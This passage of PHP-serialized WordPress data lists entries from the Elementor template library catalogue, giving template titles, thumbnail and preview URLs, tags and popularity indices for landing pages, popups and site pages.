19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";s:10:\"1520443530\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"257\";s:11:\"trend_index\";s:3:\"276\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:388;a:14:{s:2:\"id\";s:5:\"10097\";s:5:\"title\";s:37:\"Classic | Register | Subscribe | Lego\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_lego_small.png\";s:12:\"tmpl_created\";s:10:\"1547848411\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"541\";s:11:\"trend_index\";s:3:\"539\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:389;a:14:{s:2:\"id\";s:4:\"1190\";s:5:\"title\";s:26:\"Landing Page &#8211; Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp2-l.png\";s:12:\"tmpl_created\";s:10:\"1490707391\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/landing-page-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"1\";s:16:\"popularity_index\";s:1:\"5\";s:11:\"trend_index\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:390;a:14:{s:2:\"id\";s:4:\"9816\";s:5:\"title\";s:30:\"Classic | Sale | Gym | Fitness\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_sale_sport_small.png\";s:12:\"tmpl_created\";s:10:\"1547991876\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"1\";s:16:\"popularity_index\";s:3:\"549\";s:11:\"trend_index\";s:3:\"577\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:391;a:14:{s:2:\"id\";s:4:\"9602\";s:5:\"title\";s:35:\"Bottom Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2019/01/Bottombar_Announcement_small_01.png\";s:12:\"tmpl_created\";s:10:\"1546964559\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/bottom-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"1\";s:16:\"popularity_index\";s:3:\"502\";s:11:\"trend_index\";s:3:\"450\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:392;a:14:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:27:\"Homepage &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";s:10:\"1470829872\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";s:1:\"2\";s:16:\"popularity_index\";s:1:\"2\";s:11:\"trend_index\";s:1:\"2\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:393;a:14:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:22:\"Homepage &#8211; Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";s:10:\"1477388340\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";s:1:\"3\";s:16:\"popularity_index\";s:1:\"4\";s:11:\"trend_index\";s:1:\"4\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:394;a:14:{s:2:\"id\";s:5:\"10277\";s:5:\"title\";s:36:\"Bottom Bar | Promotion | Sale | Book\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/book_small.png\";s:12:\"tmpl_created\";s:10:\"1548055999\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/bottom-bar-promotion-book/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"3\";s:16:\"popularity_index\";s:3:\"562\";s:11:\"trend_index\";s:3:\"580\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:395;a:14:{s:2:\"id\";s:5:\"11241\";s:5:\"title\";s:36:\"Classic | Digital Agency | Marketing\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/PopUp_small.jpg\";s:12:\"tmpl_created\";s:10:\"1564643043\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-digital-agency-marketing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"3\";s:16:\"popularity_index\";s:3:\"443\";s:11:\"trend_index\";s:3:\"183\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:396;a:14:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:23:\"Homepage &#8211; Agency\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0019.png\";s:12:\"tmpl_created\";s:10:\"1470826567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/homepage-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:1:\"4\";s:16:\"popularity_index\";s:1:\"3\";s:11:\"trend_index\";s:1:\"3\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:397;a:14:{s:2:\"id\";s:4:\"9903\";s:5:\"title\";s:34:\"Bottom Bar | Promotion | Olive Oil\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2019/01/bottom-bar_promotion_olive_small.png\";s:12:\"tmpl_created\";s:10:\"1547838896\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/bottom-bar-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"4\";s:16:\"popularity_index\";s:3:\"579\";s:11:\"trend_index\";s:3:\"571\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:398;a:14:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:19:\"Product &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0003.png\";s:12:\"tmpl_created\";s:10:\"1470829879\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/product-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"5\";s:16:\"popularity_index\";s:2:\"11\";s:11:\"trend_index\";s:1:\"5\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:399;a:14:{s:2:\"id\";s:5:\"10549\";s:5:\"title\";s:33:\"Bottom Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/com_small.png\";s:12:\"tmpl_created\";s:10:\"1547967595\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/bottom-bar-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"6\";s:16:\"popularity_index\";s:3:\"559\";s:11:\"trend_index\";s:3:\"564\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:400;a:14:{s:2:\"id\";s:5:\"11763\";s:5:\"title\";s:27:\"Portfolio &#8211; Home Page\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Homepage_small.png\";s:12:\"tmpl_created\";s:10:\"1569428959\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/portfolio-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"creative portfolio\",\"portfolio\"]\";s:10:\"menu_order\";s:1:\"6\";s:16:\"popularity_index\";s:3:\"409\";s:11:\"trend_index\";s:3:\"133\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:401;a:14:{s:2:\"id\";s:5:\"11781\";s:5:\"title\";s:23:\"Portfolio &#8211; About\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/About_small.png\";s:12:\"tmpl_created\";s:10:\"1569428955\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/portfolio-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"creative portfolio\",\"portfolio\"]\";s:10:\"menu_order\";s:1:\"7\";s:16:\"popularity_index\";s:3:\"464\";s:11:\"trend_index\";s:3:\"141\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:402;a:14:{s:2:\"id\";s:5:\"11793\";s:5:\"title\";s:26:\"Portfolio &#8211; Projects\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Projects_small.png\";s:12:\"tmpl_created\";s:10:\"1569428951\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/portfolio-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"creative portfolio\",\"portfolio\"]\";s:10:\"menu_order\";s:1:\"8\";s:16:\"popularity_index\";s:3:\"492\";s:11:\"trend_index\";s:3:\"189\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:403;a:14:{s:2:\"id\";s:5:\"10529\";s:5:\"title\";s:36:\"Classic | Announcement | Maintenance\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/icon_small.png\";s:12:\"tmpl_created\";s:10:\"1548046309\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"9\";s:16:\"popularity_index\";s:3:\"455\";s:11:\"trend_index\";s:3:\"448\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:404;a:14:{s:2:\"id\";s:5:\"11800\";s:5:\"title\";s:25:\"Portfolio &#8211; Contact\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/09/Contact_small.png\";s:12:\"tmpl_created\";s:10:\"1569428946\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/portfolio-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"creative portfolio\",\"portfolio\"]\";s:10:\"menu_order\";s:1:\"9\";s:16:\"popularity_index\";s:3:\"521\";s:11:\"trend_index\";s:3:\"287\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:405;a:14:{s:2:\"id\";s:5:\"11163\";s:5:\"title\";s:32:\"Digital Agency &#8211; Home Page\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/07/Home_small.png\";s:12:\"tmpl_created\";s:10:\"1564641877\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/digital-agency-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"10\";s:16:\"popularity_index\";s:3:\"165\";s:11:\"trend_index\";s:2:\"30\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:406;a:14:{s:2:\"id\";s:5:\"11129\";s:5:\"title\";s:28:\"Digital Agency &#8211; About\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/About_small.png\";s:12:\"tmpl_created\";s:10:\"1564641889\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/digital-agency-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"11\";s:16:\"popularity_index\";s:3:\"317\";s:11:\"trend_index\";s:3:\"111\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:407;a:14:{s:2:\"id\";s:5:\"11074\";s:5:\"title\";s:31:\"Digital Agency &#8211; Services\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/07/Services_small.png\";s:12:\"tmpl_created\";s:10:\"1564641872\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/digital-agency-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"12\";s:16:\"popularity_index\";s:3:\"277\";s:11:\"trend_index\";s:2:\"89\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:408;a:14:{s:2:\"id\";s:5:\"11056\";s:5:\"title\";s:35:\"Digital Agency &#8211; Social Media\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/07/Social-Media_small.png\";s:12:\"tmpl_created\";s:10:\"1564641867\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/digital-agency-social-media/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"13\";s:16:\"popularity_index\";s:3:\"392\";s:11:\"trend_index\";s:3:\"184\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:409;a:14:{s:2:\"id\";s:5:\"11094\";s:5:\"title\";s:30:\"Digital Agency &#8211; Clients\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/07/Clients_small.png\";s:12:\"tmpl_created\";s:10:\"1564641885\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/digital-agency-clients/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"14\";s:16:\"popularity_index\";s:3:\"463\";s:11:\"trend_index\";s:3:\"281\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:410;a:14:{s:2:\"id\";s:5:\"11034\";s:5:\"title\";s:30:\"Digital Agency &#8211; Contact\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/07/Contsct-Us_small.png\";s:12:\"tmpl_created\";s:10:\"1564641881\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/contact-digital-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";s:2:\"15\";s:16:\"popularity_index\";s:3:\"331\";s:11:\"trend_index\";s:3:\"122\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:411;a:14:{s:2:\"id\";s:3:\"519\";s:5:\"title\";s:24:\"Homepage &#8211; Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";s:10:\"1477388808\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";s:2:\"16\";s:16:\"popularity_index\";s:1:\"8\";s:11:\"trend_index\";s:2:\"11\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:412;a:14:{s:2:\"id\";s:5:\"10413\";s:5:\"title\";s:28:\"Classic | Content Lock | Pop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/hot_small.png\";s:12:\"tmpl_created\";s:10:\"1547961774\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-content-lock/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"17\";s:16:\"popularity_index\";s:3:\"571\";s:11:\"trend_index\";s:3:\"590\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:413;a:14:{s:2:\"id\";s:4:\"9139\";s:5:\"title\";s:25:\"Homepage &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/07/Get_Started_250.png\";s:12:\"tmpl_created\";s:10:\"1532949924\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-business/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:167:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"marketing campaign\",\"marketing landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";s:2:\"17\";s:16:\"popularity_index\";s:1:\"7\";s:11:\"trend_index\";s:1:\"6\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:414;a:14:{s:2:\"id\";s:4:\"1504\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app2.png\";s:12:\"tmpl_created\";s:10:\"1494352112\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"18\";s:16:\"popularity_index\";s:3:\"140\";s:11:\"trend_index\";s:3:\"163\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:415;a:14:{s:2:\"id\";s:5:\"10223\";s:5:\"title\";s:15:\"Classic | Login\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/welcome_small.png\";s:12:\"tmpl_created\";s:10:\"1547887343\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:3:\"438\";s:11:\"trend_index\";s:3:\"466\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:416;a:14:{s:2:\"id\";s:5:\"10559\";s:5:\"title\";s:33:\"Bottom Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/fly_small.png\";s:12:\"tmpl_created\";s:10:\"1547967711\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/bottom-bar-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:3:\"529\";s:11:\"trend_index\";s:3:\"570\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:417;a:14:{s:2:\"id\";s:4:\"1503\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app1.png\";s:12:\"tmpl_created\";s:10:\"1494352113\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:3:\"143\";s:11:\"trend_index\";s:3:\"192\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:418;a:14:{s:2:\"id\";s:5:\"10403\";s:5:\"title\";s:15:\"Classic | Login\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/hello_small.png\";s:12:\"tmpl_created\";s:10:\"1548056371\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"20\";s:16:\"popularity_index\";s:3:\"499\";s:11:\"trend_index\";s:3:\"423\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:419;a:14:{s:2:\"id\";s:4:\"1634\";s:5:\"title\";s:33:\"Landing Page &#8211; Chiropractor\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Chiropractor.png\";s:12:\"tmpl_created\";s:10:\"1494352119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-chiropractor/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"20\";s:16:\"popularity_index\";s:3:\"197\";s:11:\"trend_index\";s:3:\"262\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:420;a:14:{s:2:\"id\";s:5:\"12155\";s:5:\"title\";s:26:\"Law Firm &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2019/11/home.png\";s:12:\"tmpl_created\";s:10:\"1572847054\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/law-firm-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";s:2:\"21\";s:16:\"popularity_index\";s:3:\"596\";s:11:\"trend_index\";s:2:\"43\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:421;a:14:{s:2:\"id\";s:4:\"9913\";s:5:\"title\";s:27:\"Classic | Login | Christmas\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/log_small.png\";s:12:\"tmpl_created\";s:10:\"1547841430\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"21\";s:16:\"popularity_index\";s:3:\"484\";s:11:\"trend_index\";s:3:\"472\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:422;a:14:{s:2:\"id\";s:5:\"12143\";s:5:\"title\";s:22:\"Law Firm &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/about.png\";s:12:\"tmpl_created\";s:10:\"1572847069\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/law-firm-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";s:2:\"22\";s:16:\"popularity_index\";s:3:\"601\";s:11:\"trend_index\";s:3:\"213\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:423;a:14:{s:2:\"id\";s:5:\"12133\";s:5:\"title\";s:24:\"Law Firm &#8211; Careers\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/11/careers.png\";s:12:\"tmpl_created\";s:10:\"1572847078\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-careers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";s:2:\"23\";s:16:\"popularity_index\";s:3:\"610\";s:11:\"trend_index\";s:3:\"314\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:424;a:14:{s:2:\"id\";s:5:\"12124\";s:5:\"title\";s:25:\"Law Firm &#8211; 